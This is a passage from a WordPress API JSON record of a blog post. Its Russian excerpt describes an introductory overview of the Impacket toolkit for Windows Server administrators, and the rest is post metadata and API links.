\u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0432 \u0435\u0433\u043e \u0441\u043e\u0441\u0442\u0430\u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0441 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u043d\u0430\u0438\u043c\u0435\u043d\u044c\u0448\u0435\u0439 \u043c\u0435\u0440\u0435 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f \u0438\u0437 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0445 \u0438\u043d\u043e\u0441\u0442\u0440\u0430\u043d\u043d\u044b\u0445 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439. \u0421\u0442\u0430\u0442\u044c\u044f \u043d\u043e\u0441\u0438\u0442 \u043e\u0431\u0437\u043e\u0440\u043d\u044b\u0439 \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f Impacket, \u0438 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0432 \u0442\u0435\u043c\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0437\u043d\u0430\u043a\u043e\u043c \u0441 Windows Server \u043d\u0435 \u043f\u043e\u043d\u0430\u0441\u043b\u044b\u0448\u043a\u0435, \u0438 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u043c\u0438 \u0442\u043e\u043b\u043a\u043e\u043c \u0435\u0449\u0451 \u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f.  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-350117","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/350117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=350117"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/350117\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=350117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=350117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=350117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}